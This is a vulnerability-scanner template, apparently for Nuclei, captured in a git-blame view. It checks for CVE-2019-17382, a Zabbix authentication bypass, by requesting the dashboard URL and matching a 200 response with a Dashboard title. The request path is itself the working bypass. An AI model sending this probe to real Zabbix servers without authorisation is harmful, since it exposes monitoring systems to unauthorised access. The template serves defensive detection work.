2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-17382
|
2020-07-07 04:17:27 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Zabbix Authentication Bypass
|
|
|
|
author: Harsh Bothra
|
2020-08-31 18:34:29 +00:00
|
|
|
severity: critical
|
2020-07-07 06:26:01 +00:00
|
|
|
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
2020-07-07 04:17:27 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
|
|
|
|
|
2020-07-07 06:26:01 +00:00
|
|
|
matchers-condition: and
|
2020-07-07 04:17:27 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<title>Dashboard</title>"
|